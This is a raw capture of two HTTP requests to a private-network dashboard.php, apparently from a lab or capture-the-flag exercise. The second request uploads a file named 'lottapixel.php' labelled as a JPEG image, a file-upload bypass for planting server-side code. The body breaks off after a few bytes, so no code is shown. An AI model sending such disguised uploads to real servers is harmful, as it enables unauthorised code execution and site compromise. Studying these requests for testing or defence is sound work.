GET /dashboard.php?PHPSESSID=97hca4hurd2jveu9pubiuo4331 HTTP/1.1
Host: 10.0.1.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.21/
Cookie: PHPSESSID=97hca4hurd2jveu9pubiuo4331
Connection: close
Upgrade-Insecure-Requests: 1
===================================================
POST /dashboard.php?PHPSESSID=l9uhevc0vspacro4hlh406tku6 HTTP/1.1
Host: 10.0.1.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.21/dashboard.php?PHPSESSID=l9uhevc0vspacro4hlh406tku6
Content-Type: multipart/form-data; boundary=---------------------------75295935015349299231434649948
Content-Length: 11755
Cookie: PHPSESSID=l9uhevc0vspacro4hlh406tku6
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------75295935015349299231434649948
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------75295935015349299231434649948
Content-Disposition: form-data; name="uploaded"; filename="lottapixel.php"
Content-Type: image/jpeg

د؈
